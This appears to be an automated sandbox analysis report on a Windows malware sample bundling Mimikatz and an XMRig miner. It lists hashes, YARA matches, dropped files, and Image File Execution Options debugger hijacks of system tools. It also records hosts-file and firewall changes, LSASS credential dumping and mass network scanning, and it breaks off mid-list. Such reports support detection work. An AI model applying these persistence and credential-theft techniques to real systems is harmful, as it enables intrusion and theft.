Analysis
-
max time kernel
150s -
max time network
150s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system -
submitted
18-01-2025 04:38
Behavioral task
behavioral1
Sample
2025-01-18_71aeff8b628730c816bab46cf2ba262d_hacktools_icedid_mimikatz.exe
Resource
win7-20241010-en
Behavioral task
behavioral2
Sample
2025-01-18_71aeff8b628730c816bab46cf2ba262d_hacktools_icedid_mimikatz.exe
Resource
win10v2004-20241007-en
General
-
Target
2025-01-18_71aeff8b628730c816bab46cf2ba262d_hacktools_icedid_mimikatz.exe
-
Size
9.1MB
-
MD5
71aeff8b628730c816bab46cf2ba262d
-
SHA1
e0111f251bff7cb24a1b0de8107dd0d068327f0b
-
SHA256
ca67801c72d0e6246ae665e95abf5be2bb3928f933444e32c34700d5da03ae9f
-
SHA512
ad8b72285cb64f73db516b994261e35fa77171a16e0e3d29ccb3f21a30897f73b5b745fdbf49d279e7ef79da574e9fcef6c49bf1cb010c0a70d8fcd99ae4c246
-
SSDEEP
196608:ylTPemknGzwHdOgEPHd9BYX/nivPlTXTYP:a3jz0E52/iv1
Malware Config
Signatures
-
Mimikatz
mimikatz is an open source tool to dump credentials on Windows.
-
Mimikatz family
-
Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
description pid Process procid_target PID 2088 created 2116 2088 tmyfwky.exe 38 -
Xmrig family
-
Contacts a large (30008) amount of remote hosts 1 TTPs
This may indicate a network scan to discover remotely running services.
-
Creates a large amount of network flows 1 TTPs
This may indicate a network scan to discover remotely running services.
-
OS Credential Dumping: LSASS Memory 1 TTPs
Malicious access to Credentials History.
-
XMRig Miner payload 12 IoCs
resource yara_rule behavioral2/memory/3316-177-0x00007FF7EE750000-0x00007FF7EE870000-memory.dmp xmrig behavioral2/memory/3316-181-0x00007FF7EE750000-0x00007FF7EE870000-memory.dmp xmrig behavioral2/memory/3316-198-0x00007FF7EE750000-0x00007FF7EE870000-memory.dmp xmrig behavioral2/memory/3316-211-0x00007FF7EE750000-0x00007FF7EE870000-memory.dmp xmrig behavioral2/memory/3316-222-0x00007FF7EE750000-0x00007FF7EE870000-memory.dmp xmrig behavioral2/memory/3316-230-0x00007FF7EE750000-0x00007FF7EE870000-memory.dmp xmrig behavioral2/memory/3316-247-0x00007FF7EE750000-0x00007FF7EE870000-memory.dmp xmrig behavioral2/memory/3316-440-0x00007FF7EE750000-0x00007FF7EE870000-memory.dmp xmrig behavioral2/memory/3316-441-0x00007FF7EE750000-0x00007FF7EE870000-memory.dmp xmrig behavioral2/memory/3316-552-0x00007FF7EE750000-0x00007FF7EE870000-memory.dmp xmrig behavioral2/memory/3316-807-0x00007FF7EE750000-0x00007FF7EE870000-memory.dmp xmrig behavioral2/memory/3316-808-0x00007FF7EE750000-0x00007FF7EE870000-memory.dmp xmrig -
mimikatz is an open source tool to dump credentials on Windows 5 IoCs
resource yara_rule behavioral2/memory/3692-0-0x0000000000400000-0x0000000000A9B000-memory.dmp mimikatz behavioral2/memory/3692-4-0x0000000000400000-0x0000000000A9B000-memory.dmp mimikatz behavioral2/files/0x0007000000023c72-6.dat mimikatz behavioral2/memory/2844-8-0x0000000000400000-0x0000000000A9B000-memory.dmp mimikatz behavioral2/memory/640-137-0x00007FF6FE370000-0x00007FF6FE45E000-memory.dmp mimikatz -
Drops file in Drivers directory 3 IoCs
description ioc Process File opened for modification C:\Windows\system32\drivers\etc\hosts tmyfwky.exe File created C:\Windows\system32\drivers\npf.sys wpcap.exe File created C:\Windows\system32\drivers\etc\hosts tmyfwky.exe -
Event Triggered Execution: Image File Execution Options Injection 1 TTPs 40 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\powershell.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" tmyfwky.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" tmyfwky.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Regsvr32.exe tmyfwky.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\mshta.exe tmyfwky.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\mshta.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" tmyfwky.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\at.exe tmyfwky.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\bitsadmin.exe tmyfwky.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\takeown.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" tmyfwky.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\icacls.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" tmyfwky.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\wscript.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" tmyfwky.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\magnify.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" tmyfwky.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\certutil.exe tmyfwky.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\netsh.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" tmyfwky.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\regini.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" tmyfwky.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe tmyfwky.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\cscript.exe tmyfwky.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\WmiPrvSE.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" tmyfwky.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\WinSAT.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" tmyfwky.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\takeown.exe tmyfwky.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\reg.exe tmyfwky.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\at.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" tmyfwky.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\regini.exe tmyfwky.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\powershell.exe tmyfwky.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\wscript.exe tmyfwky.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\perfmon.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" tmyfwky.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Regsvr32.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" tmyfwky.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\rundll32.exe tmyfwky.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\taskkill.exe tmyfwky.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\magnify.exe tmyfwky.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\rundll32.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" tmyfwky.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\WmiPrvSE.exe tmyfwky.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\WinSAT.exe tmyfwky.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\icacls.exe tmyfwky.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\reg.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" tmyfwky.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\perfmon.exe tmyfwky.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\certutil.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" tmyfwky.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\bitsadmin.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" tmyfwky.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\cscript.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" tmyfwky.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\taskkill.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" tmyfwky.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\netsh.exe tmyfwky.exe -
Modifies Windows Firewall 2 TTPs 2 IoCs
pid Process 1332 netsh.exe 1944 netsh.exe -
Executes dropped EXE 29 IoCs
pid Process 2844 tmyfwky.exe 2088 tmyfwky.exe 4792 wpcap.exe 2588 bzbnzbyct.exe 640 vfshost.exe 2924 cmzbnyytn.exe 4300 xohudmc.exe 3236 mesueu.exe 3316 lfbpkn.exe 1368 cmzbnyytn.exe 4360 cmzbnyytn.exe 3980 cmzbnyytn.exe 5052 cmzbnyytn.exe 3060 cmzbnyytn.exe 4992 cmzbnyytn.exe 4392 cmzbnyytn.exe 2424 cmzbnyytn.exe 1388 cmzbnyytn.exe 1112 cmzbnyytn.exe 4912 tmyfwky.exe 3248 cmzbnyytn.exe 2704 cmzbnyytn.exe 4468 cmzbnyytn.exe 1968 cmzbnyytn.exe 4360 cmzbnyytn.exe 1080 cmzbnyytn.exe 1240 cmzbnyytn.exe 4992 midctcinn.exe 4708 tmyfwky.exe -
Loads dropped DLL 12 IoCs
pid Process 4792 wpcap.exe 4792 wpcap.exe 4792 wpcap.exe 4792 wpcap.exe 4792 wpcap.exe 4792 wpcap.exe 4792 wpcap.exe 4792 wpcap.exe 4792 wpcap.exe 2588 bzbnzbyct.exe 2588 bzbnzbyct.exe 2588 bzbnzbyct.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Looks up external IP address via web service 2 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 67 ifconfig.me 68 ifconfig.me -
Creates a Windows Service
-
Drops file in System32 directory 18 IoCs
description ioc Process File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData tmyfwky.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\103621DE9CD5414CC2538780B4B75751 tmyfwky.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\103621DE9CD5414CC2538780B4B75751 tmyfwky.exe File created C:\Windows\SysWOW64\wpcap.dll wpcap.exe File opened for modification C:\Windows\SysWOW64\mesueu.exe xohudmc.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCookies tmyfwky.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\EC98FD874C34E9667158FBB7DEFBD82F tmyfwky.exe File created C:\Windows\SysWOW64\mesueu.exe xohudmc.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\Content.IE5 tmyfwky.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft tmyfwky.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache tmyfwky.exe File created C:\Windows\SysWOW64\pthreadVC.dll wpcap.exe File created C:\Windows\SysWOW64\Packet.dll wpcap.exe File created C:\Windows\system32\Packet.dll wpcap.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\EC98FD874C34E9667158FBB7DEFBD82F tmyfwky.exe File created C:\Windows\system32\wpcap.dll wpcap.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\IE tmyfwky.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content tmyfwky.exe -
resource yara_rule behavioral2/files/0x0007000000023cc4-134.dat upx behavioral2/memory/640-136-0x00007FF6FE370000-0x00007FF6FE45E000-memory.dmp upx behavioral2/memory/640-137-0x00007FF6FE370000-0x00007FF6FE45E000-memory.dmp upx behavioral2/files/0x0007000000023ccf-140.dat upx behavioral2/memory/2924-141-0x00007FF778DA0000-0x00007FF778DFB000-memory.dmp upx behavioral2/memory/2924-145-0x00007FF778DA0000-0x00007FF778DFB000-memory.dmp upx behavioral2/files/0x0007000000023ccc-162.dat upx behavioral2/memory/3316-163-0x00007FF7EE750000-0x00007FF7EE870000-memory.dmp upx behavioral2/memory/1368-170-0x00007FF778DA0000-0x00007FF778DFB000-memory.dmp upx behavioral2/memory/4360-174-0x00007FF778DA0000-0x00007FF778DFB000-memory.dmp upx behavioral2/memory/3316-177-0x00007FF7EE750000-0x00007FF7EE870000-memory.dmp upx behavioral2/memory/3980-179-0x00007FF778DA0000-0x00007FF778DFB000-memory.dmp upx behavioral2/memory/3316-181-0x00007FF7EE750000-0x00007FF7EE870000-memory.dmp upx behavioral2/memory/5052-184-0x00007FF778DA0000-0x00007FF778DFB000-memory.dmp upx behavioral2/memory/3060-188-0x00007FF778DA0000-0x00007FF778DFB000-memory.dmp upx behavioral2/memory/4992-192-0x00007FF778DA0000-0x00007FF778DFB000-memory.dmp upx behavioral2/memory/4392-196-0x00007FF778DA0000-0x00007FF778DFB000-memory.dmp upx behavioral2/memory/3316-198-0x00007FF7EE750000-0x00007FF7EE870000-memory.dmp upx behavioral2/memory/2424-201-0x00007FF778DA0000-0x00007FF778DFB000-memory.dmp upx behavioral2/memory/1388-205-0x00007FF778DA0000-0x00007FF778DFB000-memory.dmp upx behavioral2/memory/1112-209-0x00007FF778DA0000-0x00007FF778DFB000-memory.dmp upx behavioral2/memory/3316-211-0x00007FF7EE750000-0x00007FF7EE870000-memory.dmp upx behavioral2/memory/3248-217-0x00007FF778DA0000-0x00007FF778DFB000-memory.dmp upx behavioral2/memory/2704-220-0x00007FF778DA0000-0x00007FF778DFB000-memory.dmp upx behavioral2/memory/3316-222-0x00007FF7EE750000-0x00007FF7EE870000-memory.dmp upx behavioral2/memory/4468-225-0x00007FF778DA0000-0x00007FF778DFB000-memory.dmp upx behavioral2/memory/1968-229-0x00007FF778DA0000-0x00007FF778DFB000-memory.dmp upx behavioral2/memory/3316-230-0x00007FF7EE750000-0x00007FF7EE870000-memory.dmp upx behavioral2/memory/4360-232-0x00007FF778DA0000-0x00007FF778DFB000-memory.dmp upx behavioral2/memory/1080-234-0x00007FF778DA0000-0x00007FF778DFB000-memory.dmp upx behavioral2/memory/1240-236-0x00007FF778DA0000-0x00007FF778DFB000-memory.dmp upx behavioral2/memory/3316-247-0x00007FF7EE750000-0x00007FF7EE870000-memory.dmp upx behavioral2/memory/3316-440-0x00007FF7EE750000-0x00007FF7EE870000-memory.dmp upx behavioral2/memory/3316-441-0x00007FF7EE750000-0x00007FF7EE870000-memory.dmp upx behavioral2/memory/3316-552-0x00007FF7EE750000-0x00007FF7EE870000-memory.dmp upx behavioral2/memory/3316-807-0x00007FF7EE750000-0x00007FF7EE870000-memory.dmp upx behavioral2/memory/3316-808-0x00007FF7EE750000-0x00007FF7EE870000-memory.dmp upx -
Drops file in Program Files directory 3 IoCs
description ioc Process File created C:\Program Files\WinPcap\rpcapd.exe wpcap.exe File created C:\Program Files\WinPcap\LICENSE wpcap.exe File created C:\Program Files\WinPcap\uninstall.exe wpcap.exe -
Drops file in Windows directory 60 IoCs
description ioc Process File created C:\Windows\itcctjlje\Corporate\mimidrv.sys tmyfwky.exe File created C:\Windows\itcctjlje\upbdrjv\swrpwe.exe tmyfwky.exe File created C:\Windows\itcctjlje\unptrtjvi\ip.txt tmyfwky.exe File created C:\Windows\itcctjlje\UnattendGC\specials\ucl.dll tmyfwky.exe File created C:\Windows\itcctjlje\UnattendGC\specials\spoolsrv.xml tmyfwky.exe File opened for modification C:\Windows\cbdnbivt\spoolsrv.xml tmyfwky.exe File created C:\Windows\itcctjlje\UnattendGC\specials\docmicfg.xml tmyfwky.exe File created C:\Windows\itcctjlje\UnattendGC\AppCapture32.dll tmyfwky.exe File created C:\Windows\itcctjlje\UnattendGC\specials\svschost.exe tmyfwky.exe File created C:\Windows\itcctjlje\UnattendGC\docmicfg.xml tmyfwky.exe File created C:\Windows\itcctjlje\UnattendGC\specials\vimpcsvc.xml tmyfwky.exe File created C:\Windows\itcctjlje\UnattendGC\specials\trfo-2.dll tmyfwky.exe File created C:\Windows\itcctjlje\UnattendGC\vimpcsvc.xml tmyfwky.exe File created C:\Windows\cbdnbivt\docmicfg.xml tmyfwky.exe File opened for modification C:\Windows\cbdnbivt\vimpcsvc.xml tmyfwky.exe File created C:\Windows\itcctjlje\Corporate\mimilib.dll tmyfwky.exe File created C:\Windows\itcctjlje\UnattendGC\specials\spoolsrv.exe tmyfwky.exe File created C:\Windows\itcctjlje\UnattendGC\specials\vimpcsvc.exe tmyfwky.exe File created C:\Windows\itcctjlje\UnattendGC\specials\docmicfg.exe tmyfwky.exe File created C:\Windows\itcctjlje\UnattendGC\specials\libeay32.dll tmyfwky.exe File created C:\Windows\itcctjlje\unptrtjvi\bzbnzbyct.exe tmyfwky.exe File created C:\Windows\itcctjlje\unptrtjvi\Packet.dll tmyfwky.exe File created C:\Windows\itcctjlje\UnattendGC\specials\cnli-1.dll tmyfwky.exe File created C:\Windows\itcctjlje\UnattendGC\specials\ssleay32.dll tmyfwky.exe File created C:\Windows\itcctjlje\unptrtjvi\wpcap.exe tmyfwky.exe File opened for modification C:\Windows\itcctjlje\unptrtjvi\Packet.dll tmyfwky.exe File created C:\Windows\itcctjlje\UnattendGC\specials\exma-1.dll tmyfwky.exe File created C:\Windows\itcctjlje\unptrtjvi\midctcinn.exe tmyfwky.exe File created C:\Windows\itcctjlje\UnattendGC\specials\libxml2.dll tmyfwky.exe File created C:\Windows\itcctjlje\UnattendGC\schoedcl.xml tmyfwky.exe File created C:\Windows\itcctjlje\UnattendGC\Shellcode.ini tmyfwky.exe File created C:\Windows\ime\tmyfwky.exe tmyfwky.exe File created C:\Windows\itcctjlje\unptrtjvi\scan.bat tmyfwky.exe File created C:\Windows\itcctjlje\UnattendGC\specials\xdvl-0.dll tmyfwky.exe File created C:\Windows\cbdnbivt\schoedcl.xml tmyfwky.exe File opened for modification C:\Windows\cbdnbivt\schoedcl.xml tmyfwky.exe File created C:\Windows\itcctjlje\UnattendGC\svschost.xml tmyfwky.exe File created C:\Windows\cbdnbivt\svschost.xml tmyfwky.exe File opened for modification C:\Windows\itcctjlje\Corporate\log.txt cmd.exe File opened for modification C:\Windows\cbdnbivt\docmicfg.xml tmyfwky.exe File created C:\Windows\itcctjlje\UnattendGC\AppCapture64.dll tmyfwky.exe File created C:\Windows\itcctjlje\Corporate\vfshost.exe tmyfwky.exe File created C:\Windows\itcctjlje\UnattendGC\specials\zlib1.dll tmyfwky.exe File created C:\Windows\itcctjlje\UnattendGC\specials\schoedcl.xml tmyfwky.exe File created C:\Windows\cbdnbivt\tmyfwky.exe 2025-01-18_71aeff8b628730c816bab46cf2ba262d_hacktools_icedid_mimikatz.exe File created C:\Windows\itcctjlje\UnattendGC\specials\posh-0.dll tmyfwky.exe File created C:\Windows\itcctjlje\UnattendGC\specials\tibe-2.dll tmyfwky.exe File created C:\Windows\cbdnbivt\vimpcsvc.xml tmyfwky.exe File created C:\Windows\itcctjlje\UnattendGC\specials\trch-1.dll tmyfwky.exe File created C:\Windows\itcctjlje\UnattendGC\specials\svschost.xml tmyfwky.exe File created C:\Windows\cbdnbivt\spoolsrv.xml tmyfwky.exe File created C:\Windows\itcctjlje\UnattendGC\specials\crli-0.dll tmyfwky.exe File created C:\Windows\itcctjlje\UnattendGC\spoolsrv.xml tmyfwky.exe File opened for modification C:\Windows\cbdnbivt\svschost.xml tmyfwky.exe File opened for modification C:\Windows\cbdnbivt\tmyfwky.exe 2025-01-18_71aeff8b628730c816bab46cf2ba262d_hacktools_icedid_mimikatz.exe File created C:\Windows\itcctjlje\UnattendGC\specials\schoedcl.exe tmyfwky.exe File opened for modification C:\Windows\itcctjlje\unptrtjvi\Result.txt midctcinn.exe File created C:\Windows\itcctjlje\unptrtjvi\wpcap.dll tmyfwky.exe File created C:\Windows\itcctjlje\UnattendGC\specials\coli-0.dll tmyfwky.exe File created C:\Windows\itcctjlje\UnattendGC\specials\tucl-1.dll tmyfwky.exe -
Launches sc.exe 4 IoCs
Sc.exe is a Windows utlilty to control services on the system.
pid Process 1388 sc.exe 5080 sc.exe 2696 sc.exe 1976 sc.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Event Triggered Execution: Netsh Helper DLL 1 TTPs 51 IoCs
Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.
description ioc Process Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe -
System Location Discovery: System Language Discovery 1 TTPs 64 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cacls.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language sc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language PING.EXE Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language midctcinn.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened 